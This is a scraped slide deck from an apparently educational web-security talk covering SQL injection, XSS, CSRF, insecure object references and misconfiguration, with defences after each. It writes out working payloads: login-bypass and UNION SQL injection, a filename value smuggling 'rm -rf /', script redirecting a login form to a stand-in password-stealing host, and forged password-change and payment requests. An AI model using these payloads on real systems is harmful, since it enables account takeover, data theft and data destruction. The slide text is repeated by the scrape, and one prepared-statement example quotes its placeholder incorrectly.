Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Hacking Your Way
To Better Security
Colin O’Dell
@colinodell
Lead Web Developer at Unleashed Technologies
PHP developer since 2002
league/commonmark maintaine...
Goals
Explore several top security vulnerabilities
from the perspective of an attacker.
1. Understand how to detect and ex...
Disclaimers
1.NEVER test systems that aren’t
yours without explicit permission.
2.Examples in this talk are fictional, but...
OWASP Top 10
OWASP Top 10
Regular publication by The Open Web
Application Security Project
Highlights the 10 most-critical web
applicat...
SQL
Injection
Modifying SQL statements to:
Spoof identity
Tamper with data
Disclose hidden information
SQL Injection Basics
$value = $_REQUEST['value'];
SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]' ";
$sql = "SELECT * FR...
Username
Password
Log In
admin
password
Username
Password
Log In
admin
Invalid username or password. Please try again.
password'
Username
Password
Log In
admin
Unknown error.
tail –n 1 /var/log/apache2/error.log
MySQL error: You have an error in your SQL
syntax; check the manual that corresponds ...
tail –n 1 /var/log/apache2/error.log
MySQL error: You have an error in your SQL
syntax; check the manual that corresponds ...
Username
Password
Log In
admin
Unknown error.
' test
Username
Password
Log In
admin
Unknown error.
tail –n 1 /var/log/apache2/error.log
MySQL error: You have an error in your SQL
syntax; check the manual that corresponds ...
tail –n 1 /var/log/apache2/error.log
MySQL error: You have an error in your SQL
syntax; check the manual that corresponds ...
~~~~~~~~
SELECT * FROM users WHERE username = 'admin'
AND password = '' test';
SELECT * FROM users WHERE username = 'admin...
SELECT * FROM users WHERE username = 'admin' AND
password = '' test ';
' test
SELECT * FROM users WHERE username = 'admin' AND
password = '' test ';
' test
SELECT * FROM users WHERE username = 'admin'...
SELECT * FROM users WHERE username = 'admin' AND
password = ' ';
SELECT * FROM users WHERE username = 'admin' AND
password...
SELECT * FROM users WHERE username = 'admin' AND
password = '' ';
'
SELECT * FROM users WHERE username = 'admin' AND
passw...
SELECT * FROM users WHERE username = 'admin' AND
password = '' ' ';
' '
SELECT * FROM users WHERE username = 'admin' AND
p...
SELECT * FROM users WHERE username = 'admin' AND
password = '' OR ' ';
' OR '
SELECT * FROM users WHERE username = 'admin'...
SELECT * FROM users WHERE username = 'admin' AND
password = '' OR '1'='1';
' OR '1'='1
SELECT * FROM users WHERE username ...
Username
Password
Log In
admin
Unknown error.
' OR '1'='1
Welcome Admin!
Admin Menu:
Give customer money
Take money away
Review credit card applications
Close accounts
Blind SQL Injection
Blind SQL Injection
Invalid username or password. Please try again.
Unknown error.
Valid query
(empty result)
Invalid quer...
Username
Password
Log In
admin
' AND (SELECT id FROM user LIMIT 1) = '
Username
Password
Log In
admin
' AND (SELECT id FROM user LIMIT 1) = '
Unknown error.
ErrorsQuery
SELECT * FROM users WHER...
Username
Password
Log In
admin
' AND (SELECT id FROM user LIMIT 1) = '
ErrorsQuery
MySQL error: Unknown table 'user'.
Unkn...
Username
Password
Log In
admin
' AND (SELECT id FROM users LIMIT 1) = '
ErrorsQuery
MySQL error: Unknown table 'user'.
Unk...
Username
Password
Log In
admin
Invalid username or password. Please try again.
SQL Injection:
Data Disclosure
SQL Injection - Data Disclosure
http://www.onlinebookstore.com/books/123
SELECT * FROM books WHERE id = 123
$id = …;
$sql ...
SQL Injection - Data Disclosure
http://www.onlinebookstore.com/books/99999
SELECT * FROM books WHERE id = 99999
$id = …;
$...
SQL Injection - Data Disclosure
http://www.onlinebookstore.com/books/?????
SELECT * FROM books WHERE id = ?????
$id = …;
$...
SQL UNION Query
Column 1 Column 2 Column 3
The Great Gatsby F. Scott Fitzgerald 9.75
Column 1 Column 2 Column 3
Foo Bar 12...
SQL UNION Query
Column 1 Column 2 Column 3
The Great Gatsby F. Scott Fitzgerald 9.75
Column 1 Column 2 Column 3
(SELECT) 1...
SQL UNION Query
Column 1 Column 2 Column 3
(empty)
Column 1 Column 2 Column 3
(SELECT) 1 1
Column 1 Column 2 Column 3
(SEL...
SQL Injection - Data Disclosure
http://www.onlinebookstore.com/books/99999 UNION SELECT number FROM
creditcards
SELECT * F...
SQL Injection - Data Disclosure
http://www.onlinebookstore.com/books/99999 UNION SELECT number AS
'title', 1 AS 'author', ...
SQL Injection - Data Disclosure
http://www.onlinebookstore.com/books/99999 UNION SELECT number AS
'title', 1 AS 'author', ...
SQL Injection - Data Disclosure
http://www.onlinebookstore.com/books/99999 UNION SELECT number AS
'title', 1 AS 'author', ...
$val = $_REQUEST['value'];
$sql = "SELECT * FROM x WHERE y = '$val' ";
$database->query($sql);
Protecting Against
SQL Inje...
Protecting Against
SQL Injection
Block input with special
characters
Escape user input
$value = $_REQUEST['value'];
$escap...
Protecting Against
SQL Injection
Block input with special
characters
Escape user input
$value = $_REQUEST['value'];
$escap...
Protecting Against
SQL Injection
Block input with special
characters
Escape user input
Use prepared statements
$mysqli = n...
Other Types of Injection
NoSQL databases
OS Commands
LDAP Queries
SMTP Headers
$file = $_GET['filename'];
shell_exec("rm u...
XSS
Cross-Site Scripting
Injecting code into the
webpage (for other users)
• Execute malicious
scripts
• Hijack sessions
•...
XSS Attack
Basics
$value = $_POST['value'];
$value = $rssFeed->first->title;
$value = db_fetch('SELECT x FROM table');
<?p...
XSS – Cross-Site Scripting Basics
Snipicons by Snip Master licensed under CC BY-NC 3.0.
Cookie icon by Daniele De Santis l...
XSS – Cross-Site Scripting
short.ly
Paste a URL here Shorten
XSS – Cross-Site Scripting
short.ly
http://www.colinodell.com Shorten
XSS – Cross-Site Scripting
short.ly
http://www.colinodell.com Shorten
Short URL: http://short.ly/b7fe9
Original URL:http:/...
XSS – Cross-Site Scripting
short.ly
Please wait while we redirect you to
http://www.colinodell.com
XSS – Cross-Site Scripting
short.ly
<script>alert('hello world!');</script> Shorten
XSS – Cross-Site Scripting
short.ly
<script>alert('hello world!');</script> Shorten
Short URL: http://short.ly/3bs8a
Origi...
XSS – Cross-Site Scripting
short.ly
<script>alert('hello world!');</script> Shorten
Short URL: http://short.ly/3bs8a
Origi...
<p>
Short URL:
<a href="…">http://short.ly/3bs8a</a>
</p>
<p>
Original URL:
<a href="…"><script>alert('hello world!');</sc...
XSS – Cross-Site Scripting
short.ly
<iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten
XSS – Cross-Site Scripting
short.ly
<iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten
Short URL: http://sho...
XSS – Cross-Site Scripting
short.ly
Please wait while we redirect you to
XSS – Cross-Site Scripting
document.getElementById('login-form').action =
'http://malicious-site.com/steal-passwords.php';
Protecting
Against XSS
Attacks $value = $_POST['value'];
$value = db_fetch('SELECT value FROM table');
$value = $rssFeed->...
Protecting
Against XSS
Attacks
• Filter user input
$value = strip_tags($_POST['value']);
$value = strip_tags(
db_fetch('SE...
Protecting
Against XSS
Attacks
• Filter user input
• Escape user
input
$value = htmlspecialchars($_POST['value']);
$value ...
Protecting
Against XSS
Attacks
• Filter user input
• Escape user
input
• Escape output
$value = $_POST['value'];
$value = ...
Protecting
Against XSS
Attacks
• Filter user input
• Escape user
input
• Escape output
{{ some_variable }}
{{ some_variabl...
CSRF
Cross-Site Request Forgery
Execute unwanted actions
on another site which user
is logged in to.
• Change password
• T...
CSRF – Cross-Site Request Forgery
Hi Facebook! I am
colinodell and my
password is *****.
Welcome Colin!
Here’s your
news f...
CSRF – Cross-Site Request Forgery
Hi other website!
Show me your
homepage.
Sure, here you go!
Snipicons by Snip Master lic...
CSRF – Cross-Site Request Forgery
<form id="evilform"
action="https://facebook.com/password.php"
method="post">
<input typ...
CSRF – Cross-Site Request Forgery
<form id="evilform"
action="https://facebook.com/password.php"
method="post">
<input typ...
CSRF – Cross-Site Request Forgery
<form id="evilform"
action="https://facebook.com/password.php"
method="post">
<input typ...
CSRF – Cross-Site Request Forgery
short.ly
<img src="https://paypal.com/pay?email=me@evil.com&amt=9999"> Shorten
CSRF – Cross-Site Request Forgery
short.ly
Please wait while we redirect you to
X
Protecting
Against CSRF
Attacks
Use randomized CSRF
tokens
<input type="hidden" name="token"
value="ao3i4yw90sae8rhsdrf">
...
Insecure
Direct Object
References
Access & manipulate
objects you shouldn’t
have access to
Insecure Direct Object References
Insecure Direct Object References
Beverly Coop
Insecure Direct Object References
Insecure Direct Object References
Insecure Direct Object References
Insecure Direct Object References
Protecting Against
Insecure Direct
Object References
Check permission on
data input
• URL / route parameters
• Form field ...
Protecting Against
Insecure Direct
Object References
Check permission on
data input
Check permission on
data output
• Do t...
Sensitive Data
Exposure
Security
Misconfiguration
Components with
Known Vulnerabilities
http://www.example.com/CHANGELOG
http://www.example.com/composer.lock
http://www.example.com/.git/
http://www.example.com/...
Sensitive Data Exposure - CHANGELOG
Sensitive Data Exposure – composer.lock
Sensitive Data Exposure – composer.lock
Sensitive Data Exposure – .git
Sensitive Data Exposure – robots.txt
Private information that is stored, transmitted, or backed-up in
clear text (or with weak encryption)
• Customer informati...
Security Misconfiguration & Components with Known Vulnerabilities
Default accounts enabled; weak passwords
• admin / admin...
Components with Known Vulnerabilities
Components with Known Vulnerabilities
Components with Known Vulnerabilities
Protecting Against
Sensitive Data Exposure, Security
Misconfiguration, and
Components with Known
Vulnerabilities
Keep soft...
Protecting Against
Sensitive Data Exposure, Security
Misconfiguration, and
Components with Known
Vulnerabilities
Keep soft...
Protecting Against
Sensitive Data Exposure, Security
Misconfiguration, and
Components with Known
Vulnerabilities
Keep soft...
Protecting Against
Sensitive Data Exposure, Security
Misconfiguration, and
Components with Known
Vulnerabilities
Keep soft...
Next Steps
Test your own applications for vulnerabilities
Learn more about security & ethical hacking
Enter security compe...
Questions?
Thanks!
Slides & feedback: https://joind.in/17622
Colin O'Dell
@colinodell
Hacking Your Way To Better Security
Hacking Your Way To Better Security
Upcoming SlideShare
Loading in …5
×

Hacking Your Way To Better Security

589 views

Published on

The goal of this talk is to educate developers on common security vulnerabilities, how they are exploited, and how to protect against them. We'll explore several of the OWASP Top 10 attack vectors like SQL injection, XSS, CSRF, session hijacking, and insecure direct object references. Each topic will be approached from the perspective of an attacker to see how these vulnerabilities are detected and exploited using several realistic examples. Once we've established an understanding of how these attacks work, we'll look at concrete steps you can take to secure web applications against such vulnerabilities. The knowledge gained from this talk can also be used for participating in "Capture the Flag" security competitions.

Published in: Internet
  • Be the first to comment

Hacking Your Way To Better Security

  1. 1. Hacking Your Way To Better Security
  2. 2. Colin O’Dell @colinodell Lead Web Developer at Unleashed Technologies PHP developer since 2002 league/commonmark maintainer PHP 7 Upgrade Guide e-book author php[world] 2015 CtF winner
  3. 3. Goals Explore several top security vulnerabilities from the perspective of an attacker. 1. Understand how to detect and exploit common vulnerabilities 2. Learn how to protect against those vulnerabilities
  4. 4. Disclaimers 1.NEVER test systems that aren’t yours without explicit permission. 2.Examples in this talk are fictional, but the vulnerability behaviors shown are very real.
  5. 5. OWASP Top 10
  6. 6. OWASP Top 10 Regular publication by The Open Web Application Security Project Highlights the 10 most-critical web application security risks
  7. 7. SQL Injection Modifying SQL statements to: Spoof identity Tamper with data Disclose hidden information
  8. 8. SQL Injection Basics $value = $_REQUEST['value']; SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]' "; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
  9. 9. Username Password Log In admin password
  10. 10. Username Password Log In admin Invalid username or password. Please try again. password'
  11. 11. Username Password Log In admin Unknown error.
  12. 12. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $
  13. 13. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ ~~ $
  14. 14. Username Password Log In admin Unknown error. ' test
  15. 15. Username Password Log In admin Unknown error.
  16. 16. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $
  17. 17. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $ ~~~~~~~~
  18. 18. ~~~~~~~~ SELECT * FROM users WHERE username = 'admin' AND password = '' test'; SELECT * FROM users WHERE username = 'admin' AND password = ''; SELECT * FROM users WHERE username = 'admin' AND password = '' OR (something that is true); SELECT * FROM users WHERE username = 'admin' AND (true); SELECT * FROM users WHERE username = 'admin';
  19. 19. SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test
  20. 20. SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ~~~~~~~~~~~~~~~
  21. 21. SELECT * FROM users WHERE username = 'admin' AND password = ' '; SELECT * FROM users WHERE username = 'admin' AND password = ' ';
  22. 22. SELECT * FROM users WHERE username = 'admin' AND password = '' '; ' SELECT * FROM users WHERE username = 'admin' AND password = '' '; ~~~
  23. 23. SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; ' ' SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; ~~~~~~~~~~~~~~
  24. 24. SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' '; ' OR ' SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' ';
  25. 25. SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; ' OR '1'='1 SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1';
  26. 26. Username Password Log In admin Unknown error. ' OR '1'='1
  27. 27. Welcome Admin! Admin Menu: Give customer money Take money away Review credit card applications Close accounts
  28. 28. Blind SQL Injection
  29. 29. Blind SQL Injection Invalid username or password. Please try again. Unknown error. Valid query (empty result) Invalid query Welcome Admin! Valid query (with result)
  30. 30. Username Password Log In admin ' AND (SELECT id FROM user LIMIT 1) = '
  31. 31. Username Password Log In admin ' AND (SELECT id FROM user LIMIT 1) = ' Unknown error. ErrorsQuery SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = '';
  32. 32. Username Password Log In admin ' AND (SELECT id FROM user LIMIT 1) = ' ErrorsQuery MySQL error: Unknown table 'user'. Unknown error.
  33. 33. Username Password Log In admin ' AND (SELECT id FROM users LIMIT 1) = ' ErrorsQuery MySQL error: Unknown table 'user'. Unknown error.
  34. 34. Username Password Log In admin Invalid username or password. Please try again.
  35. 35. SQL Injection: Data Disclosure
  36. 36. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/123 SELECT * FROM books WHERE id = 123 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => 'The Great Gatsby', 'author' => 'F. Scott Fitzgerald', 'price' => 9.75 }
  37. 37. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 SELECT * FROM books WHERE id = 99999 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { }
  38. 38. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/????? SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
  39. 39. SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 Foo Bar 123 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Foo Bar 123 UNION
  40. 40. SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 (SELECT) 1 1 UNION
  41. 41. SQL UNION Query Column 1 Column 2 Column 3 (empty) Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 (SELECT) 1 1 UNION
  42. 42. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
  43. 43. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
  44. 44. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
  45. 45. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '4012-3456-7890-1234', 'author' => 1, 'price' => 1 }
  46. 46. $val = $_REQUEST['value']; $sql = "SELECT * FROM x WHERE y = '$val' "; $database->query($sql); Protecting Against SQL Injection Block input with special characters
  47. 47. Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
  48. 48. Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
  49. 49. Protecting Against SQL Injection Block input with special characters Escape user input Use prepared statements $mysqli = new mysqli("localhost", "user", "pass", "db"); $q = $mysqli->prepare("SELECT * FROM x WHERE y = '?' "); $q->bind_param(1, $_REQUEST['value']); $q->execute(); Native PHP: ● mysqli ● pdo_mysql Frameworks / Libraries: ● Doctrine ● Eloquent ● Zend_Db
  50. 50. Other Types of Injection NoSQL databases OS Commands LDAP Queries SMTP Headers $file = $_GET['filename']; shell_exec("rm uploads/{$file}"); /rm.php?filename=foo.jpg+%26%26+rm+-rf+%2F rm uploads/foo.jpg && rm -rf /
  51. 51. XSS Cross-Site Scripting Injecting code into the webpage (for other users) • Execute malicious scripts • Hijack sessions • Install malware • Deface websites
  52. 52. XSS Attack Basics $value = $_POST['value']; $value = $rssFeed->first->title; $value = db_fetch('SELECT x FROM table'); <?php echo $value ?> Raw code/script is injected onto a page
  53. 53. XSS – Cross-Site Scripting Basics Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
  54. 54. XSS – Cross-Site Scripting short.ly Paste a URL here Shorten
  55. 55. XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten
  56. 56. XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten Short URL: http://short.ly/b7fe9 Original URL:http://www.colinodell.com
  57. 57. XSS – Cross-Site Scripting short.ly Please wait while we redirect you to http://www.colinodell.com
  58. 58. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten
  59. 59. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL: hello world! OK X
  60. 60. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL:
  61. 61. <p> Short URL: <a href="…">http://short.ly/3bs8a</a> </p> <p> Original URL: <a href="…"><script>alert('hello world!');</script></a> </p>
  62. 62. XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten
  63. 63. XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten Short URL: http://short.ly/3bs8a Original URL:
  64. 64. XSS – Cross-Site Scripting short.ly Please wait while we redirect you to
  65. 65. XSS – Cross-Site Scripting document.getElementById('login-form').action = 'http://malicious-site.com/steal-passwords.php';
  66. 66. Protecting Against XSS Attacks $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo $value ?>
  67. 67. Protecting Against XSS Attacks • Filter user input $value = strip_tags($_POST['value']); $value = strip_tags( db_fetch('SELECT value FROM table') ); $value = strip_tags($rssFeed->first->title); <?php echo $value ?>
  68. 68. Protecting Against XSS Attacks • Filter user input • Escape user input $value = htmlspecialchars($_POST['value']); $value = htmlspecialchars( db_fetch('SELECT value FROM table') ); $value = htmlspecialchars($rssFeed->first->title); <?php echo $value ?> <script> &lt;script&gt; htmlspecialchars()
  69. 69. Protecting Against XSS Attacks • Filter user input • Escape user input • Escape output $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo htmlspecialchars($value) ?>
  70. 70. Protecting Against XSS Attacks • Filter user input • Escape user input • Escape output {{ some_variable }} {{ some_variable|raw }}
  71. 71. CSRF Cross-Site Request Forgery Execute unwanted actions on another site which user is logged in to. • Change password • Transfer funds • Anything the user can do
  72. 72. CSRF – Cross-Site Request Forgery Hi Facebook! I am colinodell and my password is *****. Welcome Colin! Here’s your news feed. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
  73. 73. CSRF – Cross-Site Request Forgery Hi other website! Show me your homepage. Sure, here you go! Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
  74. 74. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
  75. 75. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Tell Facebook we want to change our password to hacked123 Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
  76. 76. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Hi Facebook! Please change my password to hacked123. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. Done!
  77. 77. CSRF – Cross-Site Request Forgery short.ly <img src="https://paypal.com/pay?email=me@evil.com&amt=9999"> Shorten
  78. 78. CSRF – Cross-Site Request Forgery short.ly Please wait while we redirect you to X
  79. 79. Protecting Against CSRF Attacks Use randomized CSRF tokens <input type="hidden" name="token" value="ao3i4yw90sae8rhsdrf"> 1. Generate a random string per user. 2. Store it in their session. 3. Add to form as hidden field. 4. Compare submitted value to session 1. Same token? Proceed. 2. Different/missing? Reject the request.
  80. 80. Insecure Direct Object References Access & manipulate objects you shouldn’t have access to
  81. 81. Insecure Direct Object References
  82. 82. Insecure Direct Object References Beverly Coop
  83. 83. Insecure Direct Object References
  84. 84. Insecure Direct Object References
  85. 85. Insecure Direct Object References
  86. 86. Insecure Direct Object References
  87. 87. Protecting Against Insecure Direct Object References Check permission on data input • URL / route parameters • Form field inputs • Basically anything that’s an ID • If they don’t have permission, show a 403 (or 404) page
  88. 88. Protecting Against Insecure Direct Object References Check permission on data input Check permission on data output • Do they have permission to access this object? • Do they have permission to even know this exists? • This is not “security through obscurity”
  89. 89. Sensitive Data Exposure Security Misconfiguration Components with Known Vulnerabilities
  90. 90. http://www.example.com/CHANGELOG http://www.example.com/composer.lock http://www.example.com/.git/ http://www.example.com/.env http://www.example.com/robots.txt Sensitive Data Exposure
  91. 91. Sensitive Data Exposure - CHANGELOG
  92. 92. Sensitive Data Exposure – composer.lock
  93. 93. Sensitive Data Exposure – composer.lock
  94. 94. Sensitive Data Exposure – .git
  95. 95. Sensitive Data Exposure – robots.txt
  96. 96. Private information that is stored, transmitted, or backed-up in clear text (or with weak encryption) • Customer information • Credit card numbers • Credentials Sensitive Data Exposure
  97. 97. Security Misconfiguration & Components with Known Vulnerabilities Default accounts enabled; weak passwords • admin / admin Security configuration • Does SSH grant root access? • Are weak encryption keys used? Out-of-date software • Old versions with known issues • Are the versions exposed? • Unused software running (DROWN attack)
  98. 98. Components with Known Vulnerabilities
  99. 99. Components with Known Vulnerabilities
  100. 100. Components with Known Vulnerabilities
  101. 101. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date • Install critical updates immediately • Install other updates regularly
  102. 102. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root • Files which provide version numbers • README, CHANGELOG, .git, composer.lock • Database credentials & API keys • Encryption keys
  103. 103. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption • Encrypt with a strong private key • Encrypt backups and data-in-transit • Use strong hashing techniques for passwords
  104. 104. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption Test your systems • Scan your systems with automated tools • Test critical components yourself • Automated tests • Manual tests
  105. 105. Next Steps Test your own applications for vulnerabilities Learn more about security & ethical hacking Enter security competitions (like CtF) Stay informed
  106. 106. Questions?
  107. 107. Thanks! Slides & feedback: https://joind.in/17622 Colin O'Dell @colinodell

×